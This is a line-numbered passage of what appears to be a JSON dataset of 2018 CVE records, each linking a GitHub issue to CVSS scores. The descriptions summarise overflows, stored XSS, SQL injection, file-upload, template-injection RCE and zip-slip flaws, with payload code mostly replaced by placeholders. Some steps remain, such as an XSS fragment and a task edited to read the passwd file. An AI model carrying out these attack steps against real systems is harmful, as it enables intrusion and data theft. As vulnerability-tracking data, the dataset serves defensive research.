  28712. "description": "global buffer overflow in the function i2alaw_array and i2ulaw_array. version x] libsndfile: Version released NUMBERTAG libsndfile NUMBERTAG pre1. description An issue was discovered in libsndfile NUMBERTAG There is a global buffer overflow at the function i2alaw_array and i2ulaw_array, will lead to a denial of service or the others. similar this [issue URLTAG but occur at the function i2alaw_array and i2ulaw_array . target APITAG ASAN report ERRORTAG and ERRORTAG FILETAG",
  28713. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28714. "severity": "MEDIUM",
  28715. "baseScore": 6.5,
  28716. "impactScore": 3.6,
  28717. "exploitabilityScore": 2.8
  28718. },
  28719. {
  28720. "CVE_ID": "CVE-2018-19664",
  28721. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
  28722. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
  28723. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  28724. "Issue_Created_At": "2018-11-27T07:35:12Z",
  28725. "description": "heap buffer overflow in function put_pixel_rows in APITAG ERRORTAG FILETAG",
  28726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28727. "severity": "MEDIUM",
  28728. "baseScore": 6.5,
  28729. "impactScore": 3.6,
  28730. "exploitabilityScore": 2.8
  28731. },
  28732. {
  28733. "CVE_ID": "CVE-2018-19692",
  28734. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/5",
  28735. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/5",
  28736. "Repo_new": "fmsdwifull/tp5cms",
  28737. "Issue_Created_At": "2018-11-29T09:39:55Z",
  28738. "description": "tp5cms In the photo upload function position can upload any type of document. tp5cms In the photo upload function position can upload any type of document (including PHP) In the location of the upload pictures, the type of the image replacement for other types payload\uff1a ERRORTAG Return \uff1a CODETAG",
  28739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28740. "severity": "CRITICAL",
  28741. "baseScore": 9.8,
  28742. "impactScore": 5.9,
  28743. "exploitabilityScore": 3.9
  28744. },
  28745. {
  28746. "CVE_ID": "CVE-2018-19693",
  28747. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/6",
  28748. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/6",
  28749. "Repo_new": "fmsdwifull/tp5cms",
  28750. "Issue_Created_At": "2018-11-29T10:05:25Z",
  28751. "description": "System setting position exists an XSS vulnerability. System setting position exists an XSS vulnerability poc\uff1a ERRORTAG location: ERRORTAG",
  28752. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28753. "severity": "MEDIUM",
  28754. "baseScore": 6.1,
  28755. "impactScore": 2.7,
  28756. "exploitabilityScore": 2.8
  28757. },
  28758. {
  28759. "CVE_ID": "CVE-2018-19749",
  28760. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/81",
  28761. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/81",
  28762. "Repo_new": "domainmod/domainmod",
  28763. "Issue_Created_At": "2018-11-23T09:37:23Z",
  28764. "description": "Stored XSS vulnerability in Account Owners (owner name). Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG goto vulnerable endpoint NUMBERTAG At the place of owner name put xss payload \"> APITAG POC attached",
  28765. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28766. "severity": "MEDIUM",
  28767. "baseScore": 4.8,
  28768. "impactScore": 2.7,
  28769. "exploitabilityScore": 1.7
  28770. },
  28771. {
  28772. "CVE_ID": "CVE-2018-19750",
  28773. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/82",
  28774. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/82",
  28775. "Repo_new": "domainmod/domainmod",
  28776. "Issue_Created_At": "2018-11-23T10:20:29Z",
  28777. "description": "Stored XSS vulnerability in Custom Domain Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Steps: goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
  28778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28779. "severity": "MEDIUM",
  28780. "baseScore": 5.4,
  28781. "impactScore": 2.7,
  28782. "exploitabilityScore": 2.3
  28783. },
  28784. {
  28785. "CVE_ID": "CVE-2018-19752",
  28786. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/84",
  28787. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/84",
  28788. "Repo_new": "domainmod/domainmod",
  28789. "Issue_Created_At": "2018-11-23T10:47:19Z",
  28790. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
  28791. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28792. "severity": "MEDIUM",
  28793. "baseScore": 4.8,
  28794. "impactScore": 2.7,
  28795. "exploitabilityScore": 1.7
  28796. },
  28797. {
  28798. "CVE_ID": "CVE-2018-19784",
  28799. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/139",
  28800. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/139",
  28801. "Repo_new": "athlon1600/php-proxy-app",
  28802. "Issue_Created_At": "2018-11-30T03:09:48Z",
  28803. "description": "PHP Proxy APITAG APITAG Detailed steps and sample payload\uff1a URLTAG We suggest that the encryption rules should be strengthened because the logic of decryption is too easy.",
  28804. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  28805. "severity": "HIGH",
  28806. "baseScore": 7.5,
  28807. "impactScore": 3.6,
  28808. "exploitabilityScore": 3.9
  28809. },
  28810. {
  28811. "CVE_ID": "CVE-2018-19791",
  28812. "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/117",
  28813. "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/117",
  28814. "Repo_new": "litespeedtech/openlitespeed",
  28815. "Issue_Created_At": "2018-11-28T11:30:15Z",
  28816. "description": "Vulnerabilities in Openlitespeed web server. These are vulnerabilities that were discoverd during the APITAG source code for vulnerabilities\" workshop at Hack In The Box Dubai NUMBERTAG Denial of Service =================== The openlitespeed server does not correctly handle requests for byte sequences allowing an attacker to amplify the response size by requesting the entire response body repeatedly. The following curl request illustrates this issue: CODETAG Multiple buffer overflow APITAG There are a number of buffer overflows in the web server source code. While many require administrative access to alter configuration to trigger, the following example can be triggered by a local user: CODETAG The following proof of concept is offered to illustrate the buffer overflow: CODETAG",
  28817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  28818. "severity": "MEDIUM",
  28819. "baseScore": 6.5,
  28820. "impactScore": 3.6,
  28821. "exploitabilityScore": 2.8
  28822. },
  28823. {
  28824. "CVE_ID": "CVE-2018-19793",
  28825. "Issue_Url_old": "https://github.com/iwannay/jiacrontab/issues/28",
  28826. "Issue_Url_new": "https://github.com/iwannay/jiacrontab/issues/28",
  28827. "Repo_new": "iwannay/jiacrontab",
  28828. "Issue_Created_At": "2018-12-02T07:05:32Z",
  28829. "description": "Jiacrontab NUMBERTAG arbitrary code execution vulnerability. Test in the demo: FILETAG User: admin Password NUMBERTAG APITAG in APITAG task FILETAG Modify the values of command and args, Read the passwd file. > PATHTAG CODETAG NUMBERTAG Successfully added and run this task FILETAG APITAG NUMBERTAG Get echo FILETAG",
  28830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  28831. "severity": "HIGH",
  28832. "baseScore": 7.2,
  28833. "impactScore": 5.9,
  28834. "exploitabilityScore": 1.2
  28835. },
  28836. {
  28837. "CVE_ID": "CVE-2018-19797",
  28838. "Issue_Url_old": "https://github.com/sass/libsass/issues/2779",
  28839. "Issue_Url_new": "https://github.com/sass/libsass/issues/2779",
  28840. "Repo_new": "sass/libsass",
  28841. "Issue_Created_At": "2018-12-01T14:15:32Z",
  28842. "description": "Crash in APITAG function in version NUMBERTAG and latest. I found a crash by fuzzing libsass&sassc. It can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Run sassc (built with APITAG with a special file sass_id NUMBERTAG URLTAG APITAG The outputs are as follows: ERRORTAG I found the cause is that in the APITAG function in ast.cpp (the function was moved to ast_selectors.cpp several days ago), the APITAG variable is NULL when coming to the crashing line (noted below). Adding a null check on APITAG indeed could fix the problem but not sure whether there are better ways. ERRORTAG",
  28843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28844. "severity": "MEDIUM",
  28845. "baseScore": 6.5,
  28846. "impactScore": 3.6,
  28847. "exploitabilityScore": 2.8
  28848. },
  28849. {
  28850. "CVE_ID": "CVE-2018-19826",
  28851. "Issue_Url_old": "https://github.com/sass/libsass/issues/2781",
  28852. "Issue_Url_new": "https://github.com/sass/libsass/issues/2781",
  28853. "Repo_new": "sass/libsass",
  28854. "Issue_Created_At": "2018-12-03T07:37:21Z",
  28855. "description": "Out of Memory (crash) with malformed input files APITAG an extra '/' or '&'). Some malformed input could cause the libsass/sassc program out of memory and crashes. These malformed files are not big and are simply adding an extra '/' or '&' in original files (created by fuzzing). The problem can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Sample malformed input files include URLTAG and URLTAG . Run APITAG sass_mem NUMBERTAG For example, sass_mem NUMBERTAG looks like below, where the ' & ' symbol before NUMBERTAG is extra: APITAG APITAG the sass_mem NUMBERTAG file, the '/' is added later URLTAG Call stack Since the problem will crash so when I randomly stop the problem, the call stacks looks like below: CODETAG Where in APITAG ) at APITAG the APITAG line the s becomes a very long string ( APITAG ) and is keeping increasing. Seems the problem enters some endless loop . The memory footprint of the program grows quickly (to NUMBERTAG GB and above) and later the problem is killed by the system.",
  28856. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28857. "severity": "MEDIUM",
  28858. "baseScore": 6.5,
  28859. "impactScore": 3.6,
  28860. "exploitabilityScore": 2.8
  28861. },
  28862. {
  28863. "CVE_ID": "CVE-2018-19827",
  28864. "Issue_Url_old": "https://github.com/sass/libsass/issues/2782",
  28865. "Issue_Url_new": "https://github.com/sass/libsass/issues/2782",
  28866. "Repo_new": "sass/libsass",
  28867. "Issue_Created_At": "2018-12-03T12:05:02Z",
  28868. "description": "APITAG heap use after free in both libsass NUMBERTAG and latest codebase. I found a new heap use after free bug with a special sass file. The file causes heap use after free bug in both version NUMBERTAG and the latest master branch (accessed on PATHTAG ) codebase, though with slightly different crash stacks. APITAG is quite different from previous issue URLTAG .) Build libsass/saasc with APITAG APITAG Run APITAG (sass_heap_UAF is at here: URLTAG The program crashes. APITAG Crash stack Crash in the latest code (accessed on PATHTAG ) ERRORTAG Crash in libsass NUMBERTAG ERRORTAG",
  28869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28870. "severity": "HIGH",
  28871. "baseScore": 8.8,
  28872. "impactScore": 5.9,
  28873. "exploitabilityScore": 2.8
  28874. },
  28875. {
  28876. "CVE_ID": "CVE-2018-19838",
  28877. "Issue_Url_old": "https://github.com/sass/libsass/issues/2660",
  28878. "Issue_Url_new": "https://github.com/sass/libsass/issues/2660",
  28879. "Repo_new": "sass/libsass",
  28880. "Issue_Created_At": "2018-06-02T07:32:14Z",
  28881. "description": "Stack over flow errors at IMPLEMENT_AST_OPERATORS expansion. We found with our fuzzer some stack over flow errors when executing on APITAG expansion inside ast.cpp (exact lines may differ in NUMBERTAG or NUMBERTAG when compiled with different optimizations, APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
  28882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28883. "severity": "MEDIUM",
  28884. "baseScore": 6.5,
  28885. "impactScore": 3.6,
  28886. "exploitabilityScore": 2.8
  28887. },
  28888. {
  28889. "CVE_ID": "CVE-2018-19839",
  28890. "Issue_Url_old": "https://github.com/sass/libsass/issues/2657",
  28891. "Issue_Url_new": "https://github.com/sass/libsass/issues/2657",
  28892. "Repo_new": "sass/libsass",
  28893. "Issue_Created_At": "2018-06-02T07:01:37Z",
  28894. "description": "Buffer Overflow against some invalid input. We found with our fuzzer some buffer over flow errors against some invalid inputs. ERRORTAG sample input files: FILETAG FILETAG FILETAG",
  28895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28896. "severity": "MEDIUM",
  28897. "baseScore": 6.5,
  28898. "impactScore": 3.6,
  28899. "exploitabilityScore": 2.8
  28900. },
  28901. {
  28902. "CVE_ID": "CVE-2018-19841",
  28903. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/54",
  28904. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/54",
  28905. "Repo_new": "dbry/wavpack",
  28906. "Issue_Created_At": "2018-11-29T08:01:53Z",
  28907. "description": "APITAG heap buffer overflow APITAG OOB) at APITAG As of NUMBERTAG when running ERRORTAG , it may result in an read out of bound error on variable dp inside APITAG (blind decode mode is ok). ERRORTAG POCs: FILETAG",
  28908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28909. "severity": "MEDIUM",
  28910. "baseScore": 5.5,
  28911. "impactScore": 3.6,
  28912. "exploitabilityScore": 1.8
  28913. },
  28914. {
  28915. "CVE_ID": "CVE-2018-19842",
  28916. "Issue_Url_old": "https://github.com/radare/radare2/issues/12239",
  28917. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12239",
  28918. "Repo_new": "radareorg/radare2",
  28919. "Issue_Created_At": "2018-11-20T10:10:46Z",
  28920. "description": "rasm2 built with ASAN reported a stackoverflow during assembling. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | txt | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with an error message. Actual behavior rasm2 crashes with the error message that suggests it's a stack overflow relevant to APITAG ; I'm not sure whether it's reporting correctly since that array is then duplicated and accessed with the duplicated one. ERRORTAG Steps to reproduce the behavior Build APITAG with ASAN Run APITAG",
  28921. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28922. "severity": "MEDIUM",
  28923. "baseScore": 5.5,
  28924. "impactScore": 3.6,
  28925. "exploitabilityScore": 1.8
  28926. },
  28927. {
  28928. "CVE_ID": "CVE-2018-19843",
  28929. "Issue_Url_old": "https://github.com/radare/radare2/issues/12242",
  28930. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12242",
  28931. "Repo_new": "radareorg/radare2",
  28932. "Issue_Created_At": "2018-11-20T13:38:24Z",
  28933. "description": "APITAG global buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | txt | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Build radare with ASAN run APITAG Additional Logs, screenshots, source code, configuration dump, ... The offset calculated is beyond the bound of APITAG . CODETAG",
  28934. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28935. "severity": "MEDIUM",
  28936. "baseScore": 5.5,
  28937. "impactScore": 3.6,
  28938. "exploitabilityScore": 1.8
  28939. },
  28940. {
  28941. "CVE_ID": "CVE-2018-19853",
  28942. "Issue_Url_old": "https://github.com/liu946/hitshop/issues/1",
  28943. "Issue_Url_new": "https://github.com/liu946/hitshop/issues/1",
  28944. "Repo_new": "liu946/hitshop",
  28945. "Issue_Created_At": "2018-11-18T10:46:33Z",
  28946. "description": "There is a Elevation of privilege vulnerability that can control whole website. An issue was discovered in hitshop NUMBERTAG beta. There is a Elevation of privilege vulnerability which allows control the whole website Vulnerability trigger point URLTAG APITAG a normal store keeper FILETAG APITAG use store keeper jurisdiction\uff0cnow we just have the privilege of commodity management. FILETAG APITAG this account add the other administrator privilege account FILETAG APITAG the fake admin account\uff0cand now you have all system privilege. FILETAG You can change the old administrators' password or any other info of this website FILETAG",
  28947. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28948. "severity": "HIGH",
  28949. "baseScore": 8.8,
  28950. "impactScore": 5.9,
  28951. "exploitabilityScore": 2.8
  28952. },
  28953. {
  28954. "CVE_ID": "CVE-2018-19859",
  28955. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1840",
  28956. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1840",
  28957. "Repo_new": "openrefine/openrefine",
  28958. "Issue_Created_At": "2018-11-20T17:14:08Z",
  28959. "description": "Directory traversal APITAG Slip\") vulnerability . Describe the bug It is possible to create files outside the temporary folder by importing a zip file containing files with relative paths. This can be used to create scripts and configurations at locations where they can be picked up by applications, other scripts or executed during start up. Additional information URLTAG To Reproduce Video (zipped video because GH extension restrictions) FILETAG Steps to reproduce the behavior: Create payload and start server on Linux APITAG Steps on openrefine NUMBERTAG Start openrefine ($ ./refine NUMBERTAG Click on APITAG Project NUMBERTAG Click on APITAG Addresses (URLs)\" (also possible through uploading a local zip file NUMBERTAG Insert a malicious URL, eg. FILETAG NUMBERTAG If the file does not exist, the malicious file is silently created If the file does exist, openrefine shows a stack trace (see below) on terminal Current Results No error nor warning. Expected behavior Warn the user about dangerous content in the zip and prevent the creation of the file. Video The video is inside a zip file because github filexetension restrictions. Desktop (please complete the following information): OS: Linux APITAG Debian) Browser Version: Not important JRE or JDK Version: ERRORTAG And ERRORTAG APITAG (please complete the following information): Version NUMBERTAG TRUNK] and NUMBERTAG beta [TRUNK] (maybe also previous versions) Stack trace ERRORTAG",
  28960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  28961. "severity": "MEDIUM",
  28962. "baseScore": 6.5,
  28963. "impactScore": 3.6,
  28964. "exploitabilityScore": 2.8
  28965. },
  28966. {
  28967. "CVE_ID": "CVE-2018-19886",
  28968. "Issue_Url_old": "https://github.com/knik0/faac/issues/23",
  28969. "Issue_Url_new": "https://github.com/knik0/faac/issues/23",
  28970. "Repo_new": "knik0/faac",
  28971. "Issue_Created_At": "2018-12-05T03:52:43Z",
  28972. "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  28973. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28974. "severity": "MEDIUM",
  28975. "baseScore": 5.5,
  28976. "impactScore": 3.6,
  28977. "exploitabilityScore": 1.8
  28978. },
  28979. {
  28980. "CVE_ID": "CVE-2018-19887",
  28981. "Issue_Url_old": "https://github.com/knik0/faac/issues/21",
  28982. "Issue_Url_new": "https://github.com/knik0/faac/issues/21",
  28983. "Repo_new": "knik0/faac",
  28984. "Issue_Created_At": "2018-12-05T03:47:42Z",
  28985. "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  28986. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28987. "severity": "MEDIUM",
  28988. "baseScore": 5.5,
  28989. "impactScore": 3.6,
  28990. "exploitabilityScore": 1.8
  28991. },
  28992. {
  28993. "CVE_ID": "CVE-2018-19888",
  28994. "Issue_Url_old": "https://github.com/knik0/faac/issues/25",
  28995. "Issue_Url_new": "https://github.com/knik0/faac/issues/25",
  28996. "Repo_new": "knik0/faac",
  28997. "Issue_Created_At": "2018-12-05T03:57:32Z",
  28998. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  28999. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29000. "severity": "MEDIUM",
  29001. "baseScore": 5.5,
  29002. "impactScore": 3.6,
  29003. "exploitabilityScore": 1.8
  29004. },
  29005. {
  29006. "CVE_ID": "CVE-2018-19889",
  29007. "Issue_Url_old": "https://github.com/knik0/faac/issues/22",
  29008. "Issue_Url_new": "https://github.com/knik0/faac/issues/22",
  29009. "Repo_new": "knik0/faac",
  29010. "Issue_Created_At": "2018-12-05T03:49:55Z",
  29011. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29012. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29013. "severity": "MEDIUM",
  29014. "baseScore": 5.5,
  29015. "impactScore": 3.6,
  29016. "exploitabilityScore": 1.8
  29017. },
  29018. {
  29019. "CVE_ID": "CVE-2018-19890",
  29020. "Issue_Url_old": "https://github.com/knik0/faac/issues/20",
  29021. "Issue_Url_new": "https://github.com/knik0/faac/issues/20",
  29022. "Repo_new": "knik0/faac",
  29023. "Issue_Created_At": "2018-12-05T03:41:25Z",
  29024. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29025. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29026. "severity": "MEDIUM",
  29027. "baseScore": 5.5,
  29028. "impactScore": 3.6,
  29029. "exploitabilityScore": 1.8
  29030. },
  29031. {
  29032. "CVE_ID": "CVE-2018-19891",
  29033. "Issue_Url_old": "https://github.com/knik0/faac/issues/24",
  29034. "Issue_Url_new": "https://github.com/knik0/faac/issues/24",
  29035. "Repo_new": "knik0/faac",
  29036. "Issue_Created_At": "2018-12-05T03:55:04Z",
  29037. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29038. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29039. "severity": "MEDIUM",
  29040. "baseScore": 5.5,
  29041. "impactScore": 3.6,
  29042. "exploitabilityScore": 1.8
  29043. },
  29044. {
  29045. "CVE_ID": "CVE-2018-19892",
  29046. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/85",
  29047. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/85",
  29048. "Repo_new": "domainmod/domainmod",
  29049. "Issue_Created_At": "2018-12-04T19:56:25Z",
  29050. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG APITAG APITAG & notes put xss payload \"> APITAG FILETAG",
  29051. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29052. "severity": "MEDIUM",
  29053. "baseScore": 4.8,
  29054. "impactScore": 2.7,
  29055. "exploitabilityScore": 1.7
  29056. },
  29057. {
  29058. "CVE_ID": "CVE-2018-19893",
  29059. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/3",
  29060. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/3",
  29061. "Repo_new": "pbootcms/pbootcms",
  29062. "Issue_Created_At": "2018-12-04T10:40:04Z",
  29063. "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG FILETAG payload: URLTAG and we can get the damin account username and password",
  29064. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29065. "severity": "CRITICAL",
  29066. "baseScore": 9.8,
  29067. "impactScore": 5.9,
  29068. "exploitabilityScore": 3.9
  29069. },
  29070. {
  29071. "CVE_ID": "CVE-2018-19906",
  29072. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/56",
  29073. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/56",
  29074. "Repo_new": "smiffy6969/razorCMS",
  29075. "Issue_Created_At": "2018-11-03T04:55:58Z",
  29076. "description": "Stored XSS in Razor CMS. Affected software: Razor CMS version NUMBERTAG Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Razor CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: URLTAG Vulnerable parameter: description Proof of concept: Step1: Login into the Razor cms. Step2: URL: URLTAG FILETAG Here the description parameter is vulnerable to XSS. Step3: Here the xss got executed for description parameter. URL: URLTAG FILETAG",
  29077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29078. "severity": "MEDIUM",
  29079. "baseScore": 5.4,
  29080. "impactScore": 2.7,
  29081. "exploitabilityScore": 2.3
  29082. },
  29083. {
  29084. "CVE_ID": "CVE-2018-19907",
  29085. "Issue_Url_old": "https://github.com/craftercms/craftercms/issues/2677",
  29086. "Issue_Url_new": "https://github.com/craftercms/craftercms/issues/2677",
  29087. "Repo_new": "craftercms/craftercms",
  29088. "Issue_Created_At": "2018-12-05T02:18:39Z",
  29089. "description": "Critical vulnerability: Server Side Template Injection/ RCE Attack. Describe the bug Attackers may execute OS commands by APITAG a template file (.ftl filetype) which use APITAG lib to render webpage. To Reproduce Steps to reproduce the behavior NUMBERTAG Edit a template file FILETAG NUMBERTAG Add code as shown below and OK FILETAG NUMBERTAG iew web page, Window OS command was executed APITAG on windows) FILETAG Specs Version NUMBERTAG OS Windows Browser Firefox",
  29090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  29091. "severity": "HIGH",
  29092. "baseScore": 8.8,
  29093. "impactScore": 5.9,
  29094. "exploitabilityScore": 2.8
  29095. },
  29096. {
  29097. "CVE_ID": "CVE-2018-19913",
  29098. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/86",
  29099. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/86",
  29100. "Repo_new": "domainmod/domainmod",
  29101. "Issue_Created_At": "2018-12-06T07:08:05Z",
  29102. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG Reseller ID & notes put xss payload \"> APITAG FILETAG",
  29103. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29104. "severity": "MEDIUM",
  29105. "baseScore": 4.8,
  29106. "impactScore": 2.7,
  29107. "exploitabilityScore": 1.7
  29108. },
  29109. {
  29110. "CVE_ID": "CVE-2018-19914",
  29111. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/87",
  29112. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/87",
  29113. "Repo_new": "domainmod/domainmod",
  29114. "Issue_Created_At": "2018-12-06T08:38:47Z",
  29115. "description": "Cross Site Scripting Vulnerability in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint PATHTAG At the place of Profile Name & notes put xss payload \"> APITAG FILETAG",
  29116. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29117. "severity": "MEDIUM",
  29118. "baseScore": 4.8,
  29119. "impactScore": 2.7,
  29120. "exploitabilityScore": 1.7
  29121. },
  29122. {
  29123. "CVE_ID": "CVE-2018-19918",
  29124. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/3",
